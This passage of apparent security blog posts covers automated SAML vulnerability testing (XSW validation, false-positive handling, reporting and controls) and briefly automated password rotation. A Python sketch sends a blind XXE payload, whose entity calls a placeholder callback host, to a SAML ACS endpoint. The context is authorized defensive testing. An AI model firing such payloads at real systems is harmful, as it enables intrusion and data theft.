  4. Vendor or SaaS applications that have been onboarded to your IDP may not support automatic account provisioning via SAML. That means that although you may have access to the application in your IDP, the SaaS application may not recognize you as a registered user when attempting to authenticate. These applications may be difficult to test because they will never result in successful authentication until an account is created for your scans or a legitimate account is identified and impersonated – assuming the app is vulnerable. SAML tests may still work though, depending on when an application does its signature checks. Most apps will likely first go through normal SAML processing and validation and then lookup the user. In this case, tests can be conducted normally, but instead of looking for successful logins, look for deviations from the legitimate attempted login response, as mentioned in point #3 above. In the case that an application looks up the Subject (username) before validating signatures, then a testing account would need to be provisioned or you would need permission to attempt to impersonate someone who already has access. Unfortunately, these may require manual intervention and setup. You may consider running a side scan for common “user not found” responses to see where you may need to manually provision a user for SAML scans.

Eliminating False Positives

Given the likely mixture of applications’ different responses to legitimate and illegitimate SAML flows, creativity will play a strong role in determining how to best differentiate successful from failed test cases. Instead of attempting to enumerate all the various ways to identify a successful login after issuing a modified assertion, it is much easier to simply match a test’s response to that of a known successful login. For example, one could first run legitimate logins across all SAML apps, save those results, and then run the various tests against all the SAML apps. The tests that result in HTTP responses matching the legitimate responses are likely true positives. Depending on how the tests were conducted, this can produce highly accurate results.
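A minimal sketch of that baseline-matching idea follows; the fields compared and the similarity threshold are illustrative choices, and response is assumed to be a requests.Response-style object:

import hashlib
from difflib import SequenceMatcher

def fingerprint(response):
    """Reduce an HTTP response to the features worth comparing against the baseline."""
    body = response.text
    return {
        "status": response.status_code,
        "final_url": response.url,                      # captures redirects to login/error pages
        "set_cookie": "Set-Cookie" in response.headers,
        "body_hash": hashlib.sha256(body.encode()).hexdigest(),
        "body": body,
    }

def matches_baseline(test_resp, baseline_resp, threshold=0.9):
    """A tampered-assertion response that looks like a real login is a likely true positive."""
    t, b = fingerprint(test_resp), fingerprint(baseline_resp)
    if t["status"] != b["status"] or t["set_cookie"] != b["set_cookie"]:
        return False
    if t["body_hash"] == b["body_hash"]:
        return True
    # Bodies often differ slightly (timestamps, CSRF tokens), so fall back to fuzzy similarity.
    return SequenceMatcher(None, t["body"], b["body"]).ratio() >= threshold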

If the technique above does not provide sufficient confidence of a true positive, then additional checks could be performed to prove successful authentication. Some potential methods could include analyzing each request’s response time or the contents of the response headers and body. Perhaps a valid login takes longer as additional resources are fetched and loaded? Or perhaps a successful login returns a common authentication header? Or maybe a successful login returns commonly used HTML, like profile pictures, copyright dates or navigation bars? One could also use the same or similar logic to identify when a test is not successful, like when an error has prevented an exploit from succeeding, or a login failure has redirected the user back to a login form. 

Furthermore, there may be other out-of-band methods to validate a successful login, like application logging. However, scaling this validation method would require that all SAML applications log authentication results in the same consumable format and that such logs can be programmatically aggregated and fetched for analysis.

As a last resort, high-confidence findings can be manually validated. Using a combination of the other validation methods described above, a confidence rating – think of a pendulum – could be applied to findings, and then follow-up analysis can be performed after the confidence rating passes a predefined threshold.

XSW Validation

Another crucial point to keep in mind when validating results is that applications will respond differently to signature stripping and self-signing attacks versus XML Signature Wrapping (XSW) attacks. While directly removing or modifying a signature will result in a simple pass/fail scenario, the sole acceptance of an XSW payload by a SAML ACS does not prove that the ACS is vulnerable to XSW attacks. Because XSW attacks contain both the original and the modified Assertion or Response nodes, multiple tests need to be conducted for each XSW arrangement to determine which node was processed. In the scenario where an ACS successfully authenticates an XSW attack, the ACS could have ignored the fraudulent XML and processed the correctly signed and referenced XML, which doesn’t demonstrate vulnerabilities. 

One way to validate an XSW vulnerability is to attempt to impersonate another user. However, that would require a second high-privilege account and the ability to determine which user in the XSW attack was authenticated. Identifying the currently logged in user isn’t always possible, though it could potentially be done by checking the response HTML or text for a username or other identifying attribute. Instead, sending two slightly different payloads for the same XSW arrangement could indicate which Assertion or Response node is being processed by the ACS. For example, in the case of an XSW attack using a cloned Assertion, the first payload would be sent as a simple XSW attack containing two Assertions for a single legitimate user. Then an additional payload would be sent with a missing NameID (or user Subject) in the cloned Assertion. If both tests result in successful authentication, then the ACS is likely ignoring the duplicate Assertion and correctly processing the legitimately signed Assertion. If both tests fail, then the app is probably throwing an error because of duplicate Assertions (this is probably the best response to a probable attack). However, if the first test succeeds and the second test fails, then we know that the ACS is successfully processing the cloned and modified XML, thus allowing user impersonation via XSW attacks. So, if you were testing eight different XSW arrangements, then you would perform sixteen XSW tests for each application – two tests for each of the eight XSW arrangements.
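The decision logic behind that paired-payload technique can be sketched as follows; the verdict strings are illustrative, and the two boolean inputs represent whether each payload resulted in a successful login:

def classify_xsw_result(plain_clone_succeeded, missing_nameid_clone_succeeded):
    """
    For one XSW arrangement, compare two payloads: a plain clone of the signed Assertion,
    and the same clone with the NameID removed from the unsigned copy.
    """
    if plain_clone_succeeded and not missing_nameid_clone_succeeded:
        # The ACS is reading data from the cloned, unsigned Assertion: exploitable.
        return "VULNERABLE: ACS processes the unsigned clone"
    if plain_clone_succeeded and missing_nameid_clone_succeeded:
        # Both logins worked, so the ACS ignored the clone and used the signed Assertion.
        return "NOT VULNERABLE: ACS ignores the duplicate"
    if not plain_clone_succeeded and not missing_nameid_clone_succeeded:
        # Rejecting duplicate Assertions outright is arguably the safest behavior.
        return "NOT VULNERABLE: ACS rejects duplicate Assertions"
    # Only the broken payload logging in would be an odd result worth manual review.
    return "INCONCLUSIVE: review manually"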

I will be offering more best practices around enterprise SAML security in the next part of this blog later this month.

Ty Anderson
Security Researcher

Automating Enterprise SAML Security Tests – Part II


(This is part two of a two-part series offering guidance on how you can automate security tests for enterprise SAML infrastructure. In our first post we discussed the common vulnerabilities in enterprise SAML implementations and how to recognize them. We also provided guidance on how to try to eliminate false positives when attempting to detect issues. This post continues the conversation with additional guidance for setting up automated testing for issues and possible remediations) 

Reporting Findings

Prioritizing Risk and Ownership Attribution

After tests have been conducted and true positives recorded, the detections must be analyzed for risk severity and attributed to the appropriate team for remediation efforts. Digital asset valuation will not be expounded here, but factors such as environment location (internal/external), legal compliance, data sensitivity, and business importance/impact will affect the importance of an application and, subsequently, the urgency of remediation efforts. Vulnerabilities in high-value applications should be prioritized higher than similar vulnerabilities in, say, a static lunch menu.

In the case of missing application ownership attribution in the application inventory, try to be creative in finding owners by other means. Perhaps you can find a similarly named mailing list where you can find the app’s admins or a support team? Perhaps the team has an internal wiki that you could search for? Or perhaps the application itself has a Contact Us form? Different architectures in use may be helpful as well, such as a record of who requested or owns the DNS record for the app, or a platform provisioning record, or an internal cost center that the server/resources are allocated to. And, as always, look for ways in which you could automate some of this information gathering to create a trail for attribution.

Presentation

Many organizations are split into different departments with often-competing priorities. To help ease digestion of the vulnerability report or ticket, it’s important to provide accurate and concise information about the initiative and the finding. The goal here is to make it as clear and self-explanatory as possible so as to avoid repetitive questions and conversations. An example ticket outline is provided in Appendix B.

Even with all of this information, teams may still want proof of actual exploitation or may argue that they have countermeasures in place. These arguments often diminish the efficiency gains behind automation by introducing additional manual steps. Try to preemptively answer these objections before they arise. For example, screenshots or resulting HTML files can prove modification of displayed or returned SAML attributes. References to the time of the test may also point to evidence of a successful test in application logs.

Another potential argument that app teams may offer is that they are using encryption in their SAML assertions. While the intention is good, if they don’t have specific countermeasures in place, confidentiality can be broken with published and proven attacks on XML encryption (white paper). The better approach is to fix the underlying issue, then add defense in depth measures, like encryption, on top of the root fix (these encryption attacks are mitigated if signatures are used properly).

Sustainable Action

Implementing Controls

After reporting on vulnerable applications, controls need to be put into place to prevent or quickly detect additional occurrences of these issues. Below is a list of potential controls that could help (ranked most-beneficial to least-beneficial):

  1. Require a clean SAML scan during IDP onboarding. If any errors or vulnerabilities are found, the application is prevented from completely onboarding or is disabled until the application successfully passes all SAML tests.
  2. Run automated SAML scans at regular intervals and report findings to appropriate channels (auto ticket generation, instant messaging channels, email lists, etc).
  3. Require the IDP team to manually validate the absence of SAML vulnerabilities as new applications are onboarded. This could be done using the free SAML Raider tool. Testing here would be thorough and catch issues before release, but the manual effort could be burdensome, depending on the number of new applications requesting SAML.
  4. Require app teams to self-attest that their application is free of SAML vulnerabilities before onboarding (also provide link to common SAML vulnerabilities). This is mostly to raise awareness about the issues rather than to ensure a secure state, as app teams could breeze past the checklist or struggle to accurately perform the SAML tests.

It is likely that new SAML vulnerabilities will be uncovered over time, so updates to the scanning tool and regular scans will need to accompany any implemented controls. Also, changes may be made to an application’s existing SAML configuration that may introduce vulnerabilities after deployment, so subsequent scans will detect vulnerabilities there as well.

Additional steps that could help secure applications earlier in the Software Development Life Cycle (SDLC) include trainings or communications, like quarterly events, group emails or presentations. This would hopefully stop the vulnerabilities from ever entering the code, thus saving time and resources in development costs.

Another approach, though an entirely different initiative, could be assessing all applications for outdated library dependencies. For example, a novel XSW vulnerability was discovered in SimpleSAMLphp in October 2019 (see here) that is not currently present in SAML Raider tests, as of July 2020. While automated scans that use SAML Raider would have missed this, a library dependency scanner could have caught this SAML authentication bypass vulnerability as it was made public.

Additional Tips

Since SAML is based on XML, XML External Entity (XXE) attacks are another risk that could be present in the SAML ACS. Though not specifically a vulnerability in the SAML protocol itself, XXE is a high-impact vulnerability that can exist within SAML processors. Testing for XXE in SAML can be much easier than running the other SAML tests, as all that is needed are the SAML ACS endpoints. Because XML is processed top-to-bottom, the payload doesn’t need to contain a valid SAML Response – the XXE would be processed before any SAML processing occurs. Simply send an XML prolog and XXE payload to a SAML ACS and see if you can validate blind XXE injection using DNS or HTTP traffic. Keep in mind that SAML ACSs process URL-encoded and base64-encoded data from the SAMLResponse POST parameter. Although you won’t need a valid SAML Response, you will need to mimic the presentation of a legitimate SAML Response.
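Here is a minimal sketch of such a probe; the ACS URL and callback host are placeholders, and it should only be pointed at endpoints you are authorized to test:

import base64
import requests

ACS_URL = "https://app.example.com/saml/acs"          # placeholder ACS endpoint under authorized test
CALLBACK = "https://xxe-callback.example.com/probe"   # out-of-band host you control

# No valid SAML Response is needed; the prolog and DTD are parsed before any SAML logic runs.
payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE samlp:Response [ <!ENTITY xxe SYSTEM "{CALLBACK}"> ]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">&xxe;</samlp:Response>
"""

# Mimic how a browser would deliver a SAML Response: base64 in the SAMLResponse POST
# parameter (requests handles the URL-encoding of the form data).
encoded = base64.b64encode(payload.encode()).decode()
resp = requests.post(ACS_URL, data={"SAMLResponse": encoded}, timeout=30)
print(resp.status_code)  # then check the callback host's DNS/HTTP logs for a hit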

In addition to typical SAML or XML vulnerabilities, keep an eye out for other issues, like communication over HTTP or dangling SAML configurations. SAML Responses sent over HTTP could potentially be sniffed and replayed to impersonate another user. Also, dangling application configurations in the IDP that remain after the application is decommissioned could be hijacked to point users and user attributes to new rogue applications.

Common SAML Weaknesses

As SAML is an XML-based language, the primary security controls in place are XML Signatures. At a minimum, IDPs should be configured to issue and sign either the SAML Response (the root node) or the Assertion node (the element containing the given user’s identity and attributes). Preferably, both nodes are signed with a CA-signed private key to ensure the integrity and non-repudiation of the message’s details and the user’s identity. As mentioned before though, the complexity involved in correctly configuring an application to an IDP and implementing the proper validation and consumption of incoming SAML assertions introduces several openings for risk. Exploitation of these weaknesses is facilitated as SAML assertions are often returned to the end user’s browser before they are forwarded to an SP. This forwarding functionality exposes assertions to Man-in-the-Middle attacks and drastically increases the attack surface, as all users of the application (often all Active Directory users) are able to intercept and modify their own assertions. If successful, attribute modification can lead to user impersonation, privilege escalation and potentially code injection.

Falsified Signatures

In the initial phases of onboarding an application to an IDP, metadata for each side is exchanged. Embedded in this information are various connection details, including the SP’s Assertion Consumer Service (ACS) URL (where SAML assertions are sent for processing) and the IDP’s x509 public certificate (used for XML signature validation). One common mistake that applications can make when validating SAML signatures is trusting and utilizing the x509 certificates that are presented within SAML messages. Because users have access to modify assertions before they are sent to the ACS, they can strip existing XML signatures, alter their user attributes, re-sign the SAML XML with a self-signed certificate and then forward their modified assertion and self-signed certificate to the application for processing. If SPs are not using the correct IDP certificate for signature validation and are instead using certificates from within the SAML assertions, then injected, self-signed certificates could be used to validate signatures over modified SAML elements. To ensure only the correct certificate is used, applications must pull the IDP’s certificate either directly from an IDP-controlled host (like a PKI-verified web server) or from the original, stored metadata file or value that was provided during onboarding. 
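As a rough illustration of pinning the IDP certificate on the SP side, here is a sketch using the signxml library (one possible choice, not necessarily what a given SP framework uses); the certificate path is a placeholder:

from signxml import XMLVerifier

# Certificate obtained out-of-band from the IDP's metadata at onboarding time,
# never from the incoming message itself. The path is a placeholder.
with open("idp_signing_cert.pem") as f:
    IDP_CERT = f.read()

def verify_saml_response(saml_response_xml: bytes):
    """Accept only signatures that verify against the pinned IDP certificate."""
    # Passing x509_cert tells signxml to trust this certificate rather than
    # whatever certificate happens to be embedded in the message.
    return XMLVerifier().verify(saml_response_xml, x509_cert=IDP_CERT).signed_xml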

XML Signature Wrapping (XSW)

Another category of vulnerabilities commonly found in SAML is XML Signature Wrapping (XSW). This occurs when XML – or SAML – elements are cloned and rearranged in an attempt to confuse the application’s ACS into validating the provided signatures but then processing other, duplicate elements. SAML signatures often use references to point to the specific nodes they attest. Although the provided signatures may validate their referenced nodes, applications will sometimes then use top-down tree-based navigation with indexes, getElementsByTagName, or other methods to subsequently parse SAML nodes for processing, and they end up processing the wrong nodes. For example, Figure 2 below demonstrates how an Assertion could be duplicated and rearranged in an attempt to get the ACS to validate the second Assertion but then process the first, modified, unsigned Assertion.

[Figure 2: XSW example with a duplicated Assertion (image from https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)]

Stripping Signatures

In another scenario, applications may fail to validate any signature at all. This is common among applications that attempt to process SAML with custom code, rather than using a specially designed SAML library. In this case, the ACS may verify the presence of a signature but not attempt to validate it, or it may simply ignore whether or not there is any signature.

Example SAML Incident Ticket Outline

This example is provided to help you set up an issue resolution workflow for your development team as they work to apply the guidance offered in this blog.

Summary: Describe the initiative and the potential impact of the finding. This adds authority and urgency to your report and provides a quick TLDR of the ticket. 

Description: Provide a high-level overview of the issue detected and how it was discovered, then refer the reader to additional documentation established elsewhere (internal wiki, public reports, etc).

Scope: Identify the vulnerable resource (application URL, etc).

Risk Ranking: Score the vulnerability (1-10 or Low-High, etc) and provide justification for the scoring (ease of exploitability, impact, attack surface, etc). Many organizations have published authoritative and executive-backed standards that govern vulnerability management and can help support the report or ticket. The more detailed this section is, the more it will help reduce time-consuming counterarguments and repetitive requests.

Steps to Reproduce: Provide detailed instructions on how to reproduce the issue so that teams have the option to validate the vulnerability and any attempted fixes. These could be bullet points or How-To videos, though keep in mind that app teams may come back asking for help. If remediation steps are deemed too difficult, time-consuming or costly for app teams to reproduce on their own, then a regularly updated dashboard showing the status of each detection could be used to communicate the current state of the vulnerability. Another level of maturity in automation is to have the ticket strongly tied to the automation, so if the detection drops off the scans, then the ticket is closed automatically.

Suggested Remediation Steps: Because application environments and remediation limitations differ to varying extents, teams will likely be selective in which remediation steps they implement. A prioritized list of recommended solutions could be given, with further documentation linked for additional details and guidance on each option. Potential options could be migrating to other authentication methods, like OIDC, or updating the SAML library being used, or incorporating a popular, well-vetted SAML library instead of using a custom solution. Offering additional defense in depth solutions can further secure apps, like limiting visibility of apps on a need-to-know basis and adding encryption on top of secure implementations.

Additional Resources

The following are some resources that may prove useful in better understanding and testing SAML attacks:

How to Hunt Bugs in SAML (by epi052)

Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them (by Jem Jensen)

On Breaking SAML: Be Whoever You Want to Be (by various authors)

SAML Raider Burp Extension (by Bischofberger and Duss)

Happy hunting,
Ty Anderson
Security Researcher

Better Privileged Account Security Through Automation


One of the more common security issues organizations face today is helping ensure that users with elevated privileges rotate their passwords for various internal resources on a regular basis. To help enforce password rotation, organizations typically implement automatic password expiration timeframes, commonly set for every 30, 60 or 90 days. These privileged users receive several notifications in the weeks and days leading up to the expiry date, reminding them to change their expiring password before the date to avoid being locked out. 

While a step in the right direction, this approach still has drawbacks that affect both the privileged users and the security organization. For example, even with multiple notices, privileged users may forget to change their password, simply because they’re too busy or they’re on vacation on the expiration date. Or maybe they remember to rotate the password, but then they forget what they changed it to. In any case, the result is the same: frustrated users as well as frustrated IT personnel, both of whom lose valuable time in the process.

Because of all these reasons and more, many security organizations avoid enforced password rotation for privileged accounts altogether, leaving gaping holes in infrastructure security across the organization. 

But there is a better approach to password rotation: look at this as a coding problem with a coding solution. What do I mean by this? By automating the rotation of secrets through code that runs in the background, no engineering resources are required to manually enforce password rotation, and no users are burdened with having to remember to rotate passwords. It’s potentially a win-win. Security organizations can help avoid human error, reduce the time to enforce or fix problems, improve adoption of better password security and, perhaps most importantly, help ensure compliance and make quarterly compliance reviews less tedious.

At Adobe, we’ve implemented an automated secret rotation process for certain categories of user accounts, as well as through a pilot project within one of our teams for shared infrastructure resources. 

In general, here is how it works:

First, you create a spec file that includes scripts for two processes: rotating the passive secret (Step 1 in the diagram below) and applying the new passive secret to the active key (Step 2 below).

To rotate a passive secret for the Azure container registry, the code in the spec file would look something like this (NOTE: all examples shown are generic and for illustrative purposes only):

azure:
  container_registry:
    - name: testregistry
      active_key_value: "{{ docker_acr_repo_password }}"
      passive_key_path: 'IO_XT/qcrdemo:container_registry_passive'
      resource_group: "test-resource-group"

Next, you would leverage the AWS and Azure command line interfaces to rotate the passive secret to the new value. For example:

az acr credential renew -n testregistry --password-name password2

Finally, you need to apply the newly rotated passive secret to the active key. The spec file code for that process looks like this:

_vault:
  common:
    address: https://your_vault_address
    mount_point: kv
    namespace: your_vault_namespace
    version: 2
  paths:
    artifactory_corp_username: 'test/Artifactory/corp:username'
    artifactory_corp_password: 'test/Artifactory/corp:password'
    az_sp_password: 'test/Azure_Credentials/nonprod:az_sp_password'
    az_sp_tenant: 'test/Azure_Credentials/nonprod:az_sp_stage_tenant'
    az_sp_user: 'test/Azure_Credentials/nonprod:az_sp_user'
    docker_acr_repo_password: 'test/qcrdemo:container_registry_active'

One more note: this approach can be accomplished in many ways, including through a customized implementation of open-source secrets storage tools and/or whatever other secure storage mechanism makes sense for your company. And no matter where you choose to store your secrets, by treating security – and password rotation – as code, you can help improve security across your organization.
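For illustration, here is a minimal sketch of the final step using the hvac client for HashiCorp Vault (an assumed storage choice to match the spec above); the paths and mount point mirror the illustrative values, and authentication and error handling are omitted:

import hvac

# Connection details mirror the illustrative spec file above.
client = hvac.Client(url="https://your_vault_address", namespace="your_vault_namespace")
client.token = "..."  # supplied via your normal auth method (e.g., AppRole)

PASSIVE_PATH = "test/qcrdemo"              # KV v2 path holding both keys
PASSIVE_KEY = "container_registry_passive"
ACTIVE_KEY = "container_registry_active"

def promote_passive_secret():
    """Step 2: copy the freshly rotated passive secret over the active key."""
    current = client.secrets.kv.v2.read_secret_version(path=PASSIVE_PATH, mount_point="kv")
    data = current["data"]["data"]
    data[ACTIVE_KEY] = data[PASSIVE_KEY]
    client.secrets.kv.v2.create_or_update_secret(path=PASSIVE_PATH, secret=data, mount_point="kv")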

Shikha Chawla
Software Development Engineer, Platform




